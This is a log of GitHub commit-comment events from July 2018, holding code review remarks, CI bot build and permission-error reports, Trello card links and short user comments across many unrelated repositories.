{"id":"8044339018","type":"CommitCommentEvent","actor":{"login":"johnarleycano"},"repo":{"name":"johnarleycano/incidentes"},"payload":{"comment":{"id":29904958,"position":null,"line":null,"path":null,"commit_id":"66474ebc655a9f8bd53c3266276cb91a40123145","created_at":"2018-07-31T14:09:55Z","updated_at":"2018-07-31T14:09:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[incidentes] style(Parámetro - Referencias): ajuste de tamaño de columnas](https://trello.com/c/1ImChhUz/26-incidentes-stylepar%C3%A1metro-referencias-ajuste-de-tama%C3%B1o-de-columnas)"}},"created_at":"2018-07-31T14:09:55Z"}
{"id":"8044340081","type":"CommitCommentEvent","actor":{"login":"MikeTaylor"},"repo":{"name":"folio-org/stripes-core"},"payload":{"comment":{"id":29904960,"position":6,"line":4,"path":"src/userDropdownLinksService.js","commit_id":"a944624d843933ebf0a562153e24f5cdd788e23c","created_at":"2018-07-31T14:10:06Z","updated_at":"2018-07-31T14:10:06Z","author_association":"CONTRIBUTOR","body":"But wait -- isn't this function now doing the opposite of what its name says?"}},"created_at":"2018-07-31T14:10:06Z"}
{"id":"8044340394","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"mozilla/release-services"},"payload":{"comment":{"id":29904963,"position":null,"line":null,"path":null,"commit_id":"9fbf6af5d0de746d15b73ab5bb0bada81b84cbcc","created_at":"2018-07-31T14:10:09Z","updated_at":"2018-07-31T14:10:09Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/mozilla/release-services:pull-request\",\n  \"docker-worker:capability:privileged\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:index.project.releng.services.requests.pull-request.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:get:repo:github.com/mozilla-releng/services:pull-request\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:scheduler-id:taskcluster-github\",\n    \"queue:route:index.project.releng.services.requests.pull-request.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\",\n    \"queue:route:index.project.releng.services.requests.pull-request.9fbf6af5d0de746d15b73ab5bb0bada81b84cbcc\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/github-worker\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-31T14:10:09.515Z\n\n</details>"}},"created_at":"2018-07-31T14:10:09Z"}
{"id":"8044341154","type":"CommitCommentEvent","actor":{"login":"johnarleycano"},"repo":{"name":"johnarleycano/incidentes"},"payload":{"comment":{"id":29904969,"position":null,"line":null,"path":null,"commit_id":"281c202e99020e37f0832f5c87f85d4ba4450559","created_at":"2018-07-31T14:10:16Z","updated_at":"2018-07-31T14:10:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[Incidentes] style(Parámetros - Referencias) campo de tipos de calzadas](https://trello.com/c/0j1bemA5/25-incidentes-stylepar%C3%A1metros-referencias-campo-de-tipos-de-calzadas)"}},"created_at":"2018-07-31T14:10:16Z"}
{"id":"8044343596","type":"CommitCommentEvent","actor":{"login":"johnarleycano"},"repo":{"name":"johnarleycano/incidentes"},"payload":{"comment":{"id":29904979,"position":null,"line":null,"path":null,"commit_id":"aa317f11cb06f0530b539c090b2a366dacdcc5e4","created_at":"2018-07-31T14:10:38Z","updated_at":"2018-07-31T14:10:38Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[Incidentes] style(Parámetros - referencia): Agregar velocidad de señalización](https://trello.com/c/ubXKCDiA/23-incidentes-stylepar%C3%A1metros-referencia-agregar-velocidad-de-se%C3%B1alizaci%C3%B3n)"}},"created_at":"2018-07-31T14:10:38Z"}
{"id":"8044345529","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29904984,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-31T14:10:53Z","updated_at":"2018-07-31T14:10:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T14:10:53Z"}
{"id":"8044348213","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29904998,"position":5,"line":21,"path":"tests/TicTacToeTest.php","commit_id":"e3e5fa03255223e1af32658409bea44909a83941","created_at":"2018-07-31T14:11:17Z","updated_at":"2018-07-31T14:11:17Z","author_association":"NONE","body":"This is not the best place to attack the problem. The previous version was better, because it was less verbose, and we're in an implementation detail (a private method).\r\n\r\nInstead... see other comments."}},"created_at":"2018-07-31T14:11:17Z"}
{"id":"8044348430","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29905001,"position":null,"line":null,"path":null,"commit_id":"16bfa0e843c29d6245631b4335f6e6ef0d47cc8d","created_at":"2018-07-31T14:11:19Z","updated_at":"2018-07-31T14:11:19Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2995 of 2995 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T14:11:19Z"}
{"id":"8044349383","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29905002,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-31T14:11:28Z","updated_at":"2018-07-31T14:11:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T14:11:28Z"}
{"id":"8044352310","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"NytroCO/NuVotifier"},"payload":{"comment":{"id":29905012,"position":null,"line":null,"path":null,"commit_id":"57ab4e6fcffefb2475ef9f5392ab00f77d7f976e","created_at":"2018-07-31T14:11:55Z","updated_at":"2018-07-31T14:11:55Z","author_association":"NONE","body":"Sure.\r\n\r\nSo far I have not noticed the error but I'll keep you posted!"}},"created_at":"2018-07-31T14:11:55Z"}
{"id":"8044352865","type":"CommitCommentEvent","actor":{"login":"dengmin123"},"repo":{"name":"dengmin123/Hello-Word"},"payload":{"comment":{"id":29905015,"position":null,"line":null,"path":null,"commit_id":"4f3f9fef2119863148c0d5727694c0f5dd68b69d","created_at":"2018-07-31T14:11:59Z","updated_at":"2018-07-31T14:11:59Z","author_association":"OWNER","body":"This is hello1."}},"created_at":"2018-07-31T14:11:59Z"}
{"id":"8044353531","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29905016,"position":23,"line":38,"path":"tests/TicTacToeTest.php","commit_id":"e3e5fa03255223e1af32658409bea44909a83941","created_at":"2018-07-31T14:12:06Z","updated_at":"2018-07-31T14:12:06Z","author_association":"NONE","body":"Why not array_fill with `Mark::SYMBOL_NONE`?"}},"created_at":"2018-07-31T14:12:06Z"}
{"id":"8044359040","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29905022,"position":40,"line":53,"path":"tests/TicTacToeTest.php","commit_id":"e3e5fa03255223e1af32658409bea44909a83941","created_at":"2018-07-31T14:12:56Z","updated_at":"2018-07-31T14:12:56Z","author_association":"NONE","body":"`array_fill` like above, and overwrite the necessary positions in a subsequent step."}},"created_at":"2018-07-31T14:12:56Z"}
{"id":"8044363095","type":"CommitCommentEvent","actor":{"login":"andhie"},"repo":{"name":"hannesa2/MPAndroidChart"},"payload":{"comment":{"id":29905040,"position":6,"line":4,"path":"MPChartLib/proguard-project.txt","commit_id":"45f20de7cb40827301ef1a7916ed1db33d7b2fbb","created_at":"2018-07-31T14:13:33Z","updated_at":"2018-07-31T14:13:33Z","author_association":"NONE","body":"this line need to be removed"}},"created_at":"2018-07-31T14:13:33Z"}
{"id":"8044365709","type":"CommitCommentEvent","actor":{"login":"MastaG"},"repo":{"name":"PLi-metas/meta-fulan"},"payload":{"comment":{"id":29905043,"position":null,"line":null,"path":null,"commit_id":"b00e31faaebd874e9981431d2677c88efac1046b","created_at":"2018-07-31T14:13:56Z","updated_at":"2018-07-31T14:13:56Z","author_association":"MEMBER","body":"yes, but kernelwifi, kernelextrawifi and externalwifi don't match wlan drivers available on fulan-sh4 platform.\r\nRemember it uses a very old kernel (2.6.32).\r\nThere are multiple BSP-layers with a custom wifi-drivers.inc file for including specific wifi-drivers.\r\nSo I'll create a separate file for that."}},"created_at":"2018-07-31T14:13:56Z"}
{"id":"8044366745","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29905047,"position":52,"line":64,"path":"tests/TicTacToeTest.php","commit_id":"e3e5fa03255223e1af32658409bea44909a83941","created_at":"2018-07-31T14:14:06Z","updated_at":"2018-07-31T14:14:06Z","author_association":"NONE","body":"Find a common prefix for the constants in `GameStatus`. Then you don't need the hack with `_` at the end.\r\n\r\nExample: `GameStatus::STATUS_END`."}},"created_at":"2018-07-31T14:14:06Z"}
{"id":"8044372627","type":"CommitCommentEvent","actor":{"login":"matto910"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":29905066,"position":null,"line":null,"path":null,"commit_id":"8ef039ec281a7fc6af014b42fc69a9d77e4bf277","created_at":"2018-07-31T14:14:57Z","updated_at":"2018-07-31T14:14:57Z","author_association":"NONE","body":"Where can I find gallery.phtml?\r\napp/code/Magento does not exist in my installation (2.2.5)"}},"created_at":"2018-07-31T14:14:57Z"}
{"id":"8044373885","type":"CommitCommentEvent","actor":{"login":"natali-zaitseva"},"repo":{"name":"folio-org/stripes-core"},"payload":{"comment":{"id":29905069,"position":6,"line":4,"path":"src/userDropdownLinksService.js","commit_id":"a944624d843933ebf0a562153e24f5cdd788e23c","created_at":"2018-07-31T14:15:10Z","updated_at":"2018-07-31T14:15:10Z","author_association":"NONE","body":"you are right, I will change the name to checkSSONotEnabled. is it ok?"}},"created_at":"2018-07-31T14:15:10Z"}
{"id":"8044378289","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29905078,"position":null,"line":null,"path":null,"commit_id":"16bfa0e843c29d6245631b4335f6e6ef0d47cc8d","created_at":"2018-07-31T14:15:47Z","updated_at":"2018-07-31T14:15:47Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T14:15:47Z"}
{"id":"8044379854","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29905081,"position":102,"line":115,"path":"tests/TicTacToeTest.php","commit_id":"e3e5fa03255223e1af32658409bea44909a83941","created_at":"2018-07-31T14:16:01Z","updated_at":"2018-07-31T14:16:01Z","author_association":"NONE","body":"Pack the solution from above with array_fill in a reusable helper method and reuse it. Or even better, turn `createMarksArray` into that method which creates an array of 9 `SYMBOL_NONE` inside, and rename that method to something like `createEmptyTableSpec`."}},"created_at":"2018-07-31T14:16:01Z"}
{"id":"8044381208","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29905083,"position":null,"line":null,"path":null,"commit_id":"1982999682597febe175b8eabb62579c98e80dd0","created_at":"2018-07-31T14:16:13Z","updated_at":"2018-07-31T14:16:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [make the web notifications pop when the learnings finish.](https://trello.com/c/FnIKwbqs/34-make-the-web-notifications-pop-when-the-learnings-finish)"}},"created_at":"2018-07-31T14:16:13Z"}
{"id":"8044382849","type":"CommitCommentEvent","actor":{"login":"Timo614"},"repo":{"name":"big-neon/bn-db"},"payload":{"comment":{"id":29905087,"position":15,"line":15,"path":"migrations/00000000000012_organization_invites/up.sql","commit_id":"29fe7c46fd95aecdfaac2d40ac862be2f7cdcfbb","created_at":"2018-07-31T14:16:27Z","updated_at":"2018-07-31T14:16:27Z","author_association":"COLLABORATOR","body":"May be worth removing one of these in master since it looks like we by mistake added a dupe index here for the `organization_invites ` `organization_id`. "}},"created_at":"2018-07-31T14:16:27Z"}
{"id":"8044383462","type":"CommitCommentEvent","actor":{"login":"fildunsky"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29905090,"position":null,"line":null,"path":null,"commit_id":"3dd73de76669892f9c4a11536fd0363f55ff7a99","created_at":"2018-07-31T14:16:33Z","updated_at":"2018-07-31T14:16:33Z","author_association":"MEMBER","body":"Oh wow! Looking soooo cool! Just love it! Killer feature!\r\n<img width=\"1338\" alt=\"2018-07-31 17 12 20\" src=\"https://user-images.githubusercontent.com/32987666/43465020-18d61916-94e5-11e8-8f9a-6008ce6fb61b.png\">\r\n\r\nCould we quickly remove that `Blog` header and move refresh button down? What do you say?\r\n\r\n<img width=\"1338\" alt=\"2018-07-31 17 12 20\" src=\"https://user-images.githubusercontent.com/32987666/43465156-7028275e-94e5-11e8-88ee-d3a721a6f761.png\">"}},"created_at":"2018-07-31T14:16:33Z"}
{"id":"8044384374","type":"CommitCommentEvent","actor":{"login":"zhan4139"},"repo":{"name":"dancormier/react-native-swipeout"},"payload":{"comment":{"id":29905092,"position":null,"line":null,"path":null,"commit_id":"6bff217b7df9527a80d4e2f52c24838b88ff52f6","created_at":"2018-07-31T14:16:42Z","updated_at":"2018-07-31T14:16:42Z","author_association":"NONE","body":"But I guess this is the source we are having the problem since I already bumped up the version to 2.3.4"}},"created_at":"2018-07-31T14:16:42Z"}
{"id":"8044384930","type":"CommitCommentEvent","actor":{"login":"TipsyPixie"},"repo":{"name":"TipsyPixie/react-from-scratch"},"payload":{"comment":{"id":29905094,"position":null,"line":null,"path":null,"commit_id":"aa8990567a19eb33f5c41b3d5df714763e6dbff1","created_at":"2018-07-31T14:16:47Z","updated_at":"2018-07-31T14:16:47Z","author_association":"OWNER","body":"fixed paths in .flowconfig"}},"created_at":"2018-07-31T14:16:47Z"}
{"id":"8044383999","type":"CommitCommentEvent","actor":{"login":"lauravignoli"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29905091,"position":30,"line":62,"path":"api/src/test/java/org/openmrs/module/msfcore/api/MSFCoreServiceTest.java","commit_id":"524e47f76ac94b994c5863f0efc3b1f7879c7a5f","created_at":"2018-07-31T14:16:38Z","updated_at":"2018-07-31T14:16:38Z","author_association":"NONE","body":"@kaweesi It's not necessary to throw exception here and other tests."}},"created_at":"2018-07-31T14:16:38Z"}
{"id":"8044393090","type":"CommitCommentEvent","actor":{"login":"ShaneXie"},"repo":{"name":"buunguyen/octotree"},"payload":{"comment":{"id":29905107,"position":null,"line":null,"path":null,"commit_id":"0aa79cd472182e34f648b8e6b99cd31a3f24c092","created_at":"2018-07-31T14:17:54Z","updated_at":"2018-07-31T14:17:54Z","author_association":"NONE","body":"@jwdsy the reason is right [above](https://github.com/buunguyen/octotree/commit/0aa79cd472182e34f648b8e6b99cd31a3f24c092#diff-04c6e90faac2675aa89e2176d2eec7d8R9)"}},"created_at":"2018-07-31T14:17:54Z"}
{"id":"8044393423","type":"CommitCommentEvent","actor":{"login":"MiyaNoctem"},"repo":{"name":"vinuvarshith/civicrm-core"},"payload":{"comment":{"id":29905109,"position":4,"line":695,"path":"CRM/Admin/Form/ScheduleReminders.php","commit_id":"9a48cefc40f6dde7341362485e25352176ec6d09","created_at":"2018-07-31T14:17:57Z","updated_at":"2018-07-31T14:17:57Z","author_association":"NONE","body":"Blank line before return."}},"created_at":"2018-07-31T14:17:57Z"}
{"id":"8044396308","type":"CommitCommentEvent","actor":{"login":"fredngo"},"repo":{"name":"HeeL/scrollinity"},"payload":{"comment":{"id":29905114,"position":null,"line":null,"path":null,"commit_id":"4eb87b7544e38d594e3b0c7891cab94652393922","created_at":"2018-07-31T14:18:24Z","updated_at":"2018-07-31T14:18:24Z","author_association":"CONTRIBUTOR","body":"@everaldo I don't have admin privileges on this gem. @HeeL is the only one that can do it. 😞 "}},"created_at":"2018-07-31T14:18:24Z"}
{"id":"8044445705","type":"CommitCommentEvent","actor":{"login":"musleh79"},"repo":{"name":"v3l0c1r4pt0r/linear-programming"},"payload":{"comment":{"id":29905191,"position":null,"line":null,"path":null,"commit_id":"4c3daa669ebcb49e2c31d1763e6f2c9f00d0b7d4","created_at":"2018-07-31T14:24:53Z","updated_at":"2018-07-31T14:24:53Z","author_association":"NONE","body":"good night, sir\r\nI am from Indonesia. I want to ask you a dual simplex algorithm. You try always error errors. is there any error in entering the parameter?"}},"created_at":"2018-07-31T14:24:53Z"}
{"id":"8044447723","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29905194,"position":92,"line":406,"path":"code/drasil-example/Drasil/SWHS/Body.hs","commit_id":"04136f622b83bfb2748ad8cf3edfa5d456f3ff1b","created_at":"2018-07-31T14:25:11Z","updated_at":"2018-07-31T14:25:11Z","author_association":"COLLABORATOR","body":"Yes because these are also defined in this file starting from [line 1177](https://github.com/JacquesCarette/Drasil/commit/04136f622b83bfb2748ad8cf3edfa5d456f3ff1b#diff-ea559ffbdb878b6c8c3ea27032bc2e47R1177)."}},"created_at":"2018-07-31T14:25:11Z"}
{"id":"8044450208","type":"CommitCommentEvent","actor":{"login":"ranadasuk"},"repo":{"name":"renebock/wonder"},"payload":{"comment":{"id":29905198,"position":13,"line":400,"path":"Frameworks/Core/ERExtensions/Sources/er/extensions/eof/ERXObjectStoreCoordinatorSynchronizer.java","commit_id":"5a8beeecfc902800f3d50824dd77e0e63ae785a5","created_at":"2018-07-31T14:25:32Z","updated_at":"2018-07-31T14:25:32Z","author_association":"NONE","body":"Thank You So Much! \r\nI am just setting my eclipse up to compile the Frameworks :)"}},"created_at":"2018-07-31T14:25:32Z"}
{"id":"8044451119","type":"CommitCommentEvent","actor":{"login":"cajahnke"},"repo":{"name":"cajahnke/blacklight"},"payload":{"comment":{"id":29905199,"position":null,"line":null,"path":null,"commit_id":"ff3a5709903991b2a403acb33f7fcde8124b94e3","created_at":"2018-07-31T14:25:39Z","updated_at":"2018-07-31T14:25:39Z","author_association":"OWNER","body":"add optional autocomplete_suggester parameter, in case it has been changed from the default suggested in the Lucene documentation"}},"created_at":"2018-07-31T14:25:39Z"}
{"id":"8044462213","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29905222,"position":237,"line":1168,"path":"code/drasil-example/Drasil/SWHS/Body.hs","commit_id":"04136f622b83bfb2748ad8cf3edfa5d456f3ff1b","created_at":"2018-07-31T14:27:14Z","updated_at":"2018-07-31T14:27:14Z","author_association":"COLLABORATOR","body":"Yes because there is a duplicate version of these definitions in the [IMods.hs file](https://github.com/JacquesCarette/Drasil/commit/04136f622b83bfb2748ad8cf3edfa5d456f3ff1b#diff-9de3590e3f6541a739713d985f90b267R296)."}},"created_at":"2018-07-31T14:27:14Z"}
{"id":"8044472461","type":"CommitCommentEvent","actor":{"login":"VincentWangcf"},"repo":{"name":"VincentWangcf/20180730test"},"payload":{"comment":{"id":29905245,"position":null,"line":null,"path":null,"commit_id":"dfb3cfc649fabbd85d37f6306db6b3370018873c","created_at":"2018-07-31T14:28:46Z","updated_at":"2018-07-31T14:28:46Z","author_association":"OWNER","body":"te"}},"created_at":"2018-07-31T14:28:46Z"}
{"id":"8044472611","type":"CommitCommentEvent","actor":{"login":"garun2536"},"repo":{"name":"DanielMartinus/Konfetti"},"payload":{"comment":{"id":29905247,"position":null,"line":null,"path":null,"commit_id":"a0a76b3c77b112baed303f47b7f37f1826d6b54a","created_at":"2018-07-31T14:28:48Z","updated_at":"2018-07-31T14:28:48Z","author_association":"NONE","body":"ดี"}},"created_at":"2018-07-31T14:28:48Z"}
{"id":"8044480996","type":"CommitCommentEvent","actor":{"login":"luluruss"},"repo":{"name":"Microsoft/WindowsCommunityToolkit"},"payload":{"comment":{"id":29905265,"position":null,"line":null,"path":null,"commit_id":"62d257859094da21cfe7d60a0abd4c68c4b39d80","created_at":"2018-07-31T14:30:03Z","updated_at":"2018-07-31T14:30:03Z","author_association":"NONE","body":"I"}},"created_at":"2018-07-31T14:30:03Z"}
{"id":"8044481410","type":"CommitCommentEvent","actor":{"login":"shankarnakai"},"repo":{"name":"filipenos/dotfiles"},"payload":{"comment":{"id":29905269,"position":26,"line":121,"path":"vimrc","commit_id":"821e64da94567ce1e084c75e3741fbe4fcf347ed","created_at":"2018-07-31T14:30:08Z","updated_at":"2018-07-31T14:30:08Z","author_association":"NONE","body":"Gostei da função :)\r\nSó estava pensando, será que não seria melhor deixar essa função disponível apenas para os arquivos to tipo *.go. Vi que o if na linha 112 está fazendo isso, mas talves poderia ser por mapeamento.\r\nAlgo do tipo:\r\nautocmd FileType go map <Leader>B :call Build()<CR>"}},"created_at":"2018-07-31T14:30:08Z"}
{"id":"8044489844","type":"CommitCommentEvent","actor":{"login":"brandonpittman"},"repo":{"name":"brandonpittman/geekbar"},"payload":{"comment":{"id":29905285,"position":null,"line":null,"path":null,"commit_id":"60da0412f154e382a9e275fa3b9e92ea7acd1142","created_at":"2018-07-31T14:31:22Z","updated_at":"2018-07-31T14:31:22Z","author_association":"OWNER","body":"If you search for brandonpittman on Line, you should find me. "}},"created_at":"2018-07-31T14:31:22Z"}
{"id":"8044490102","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29905286,"position":70,"line":122,"path":"src/store/addressbooks.js","commit_id":"97b235b5fb732f7ba222260e231460db7d1a121a","created_at":"2018-07-31T14:31:25Z","updated_at":"2018-07-31T14:31:25Z","author_association":"COLLABORATOR","body":"@suntala for the import button, you can directly use this function (`parseVcf(vcfFile, addressbook)`) to pass the read file and add the contacts to the addressbook :)\r\n\r\nRough example:\r\n\r\n```\r\nvar file = fileInput.files[0]\r\n\r\nif (file.type.match(/text.*/)) {\r\n\tvar reader = new FileReader()\r\n\r\n\t// when file finished loading\r\n\treader.onload = function(e) {\r\n\t\tparseVcf(reader.result, addressbook)\r\n\t}\r\n\r\n\t// trigger the load of the file\r\n\treader.readAsText(file)\r\n} else {\r\n\t// File not supported!\r\n}\r\n\r\n```"}},"created_at":"2018-07-31T14:31:25Z"}
{"id":"8044491263","type":"CommitCommentEvent","actor":{"login":"MiyaNoctem"},"repo":{"name":"vinuvarshith/civicrm-core"},"payload":{"comment":{"id":29905292,"position":6,"line":216,"path":"templates/CRM/Admin/Form/ScheduleReminders.tpl","commit_id":"9a48cefc40f6dde7341362485e25352176ec6d09","created_at":"2018-07-31T14:31:35Z","updated_at":"2018-07-31T14:31:35Z","author_association":"NONE","body":"You should probably remove this line."}},"created_at":"2018-07-31T14:31:35Z"}
{"id":"8044496721","type":"CommitCommentEvent","actor":{"login":"mevlanaayas"},"repo":{"name":"Unichain-turkey/unichaintr-vue.com"},"payload":{"comment":{"id":29905309,"position":5,"line":13,"path":"src/components/Feeds.vue","commit_id":"b56e4d75960b6a3a51d153458aa7fc935850c432","created_at":"2018-07-31T14:32:24Z","updated_at":"2018-07-31T14:32:24Z","author_association":"MEMBER","body":"Rejected"}},"created_at":"2018-07-31T14:32:24Z"}
{"id":"8044499635","type":"CommitCommentEvent","actor":{"login":"reipalacio"},"repo":{"name":"reipalacio/Vertex"},"payload":{"comment":{"id":29905319,"position":1,"line":1,"path":"README.md","commit_id":"d9bf8b0bf6e2f2735942fa36d9c1f2e922aa14e5","created_at":"2018-07-31T14:32:50Z","updated_at":"2018-07-31T14:32:50Z","author_association":"OWNER","body":"xxx"}},"created_at":"2018-07-31T14:32:50Z"}
{"id":"8044499902","type":"CommitCommentEvent","actor":{"login":"Gurskiy"},"repo":{"name":"Gurskiy/HomeAssistant"},"payload":{"comment":{"id":29905321,"position":null,"line":null,"path":null,"commit_id":"79269156fec769c13246134f50a50086cbd88836","created_at":"2018-07-31T14:32:52Z","updated_at":"2018-07-31T14:32:52Z","author_association":"OWNER","body":"только сейчас понял, что забыл фейковые сертификаты прописать в gitignore"}},"created_at":"2018-07-31T14:32:52Z"}
{"id":"8044500282","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29905322,"position":null,"line":null,"path":null,"commit_id":"d7a105bd0db5f06130040363e15ad5ba456cb8b0","created_at":"2018-07-31T14:32:55Z","updated_at":"2018-07-31T14:32:55Z","author_association":"COLLABORATOR","body":"Being worked on in the addLabels branch."}},"created_at":"2018-07-31T14:32:55Z"}
{"id":"8044503007","type":"CommitCommentEvent","actor":{"login":"TingPing"},"repo":{"name":"flathub/com.github.eudaldgr.elements"},"payload":{"comment":{"id":29905332,"position":null,"line":null,"path":null,"commit_id":"3c108ae220c90c47db760acf1a1c496789520bb4","created_at":"2018-07-31T14:33:20Z","updated_at":"2018-07-31T14:33:20Z","author_association":"MEMBER","body":"I mean it is an exactly equal tarball, not a lot to go wrong."}},"created_at":"2018-07-31T14:33:20Z"}
{"id":"8044503602","type":"CommitCommentEvent","actor":{"login":"MiyaNoctem"},"repo":{"name":"vinuvarshith/civicrm-core"},"payload":{"comment":{"id":29905333,"position":22,"line":232,"path":"templates/CRM/Admin/Form/ScheduleReminders.tpl","commit_id":"9a48cefc40f6dde7341362485e25352176ec6d09","created_at":"2018-07-31T14:33:25Z","updated_at":"2018-07-31T14:33:25Z","author_association":"NONE","body":"The comment here also should be removed, as the next commented `alert()`."}},"created_at":"2018-07-31T14:33:25Z"}
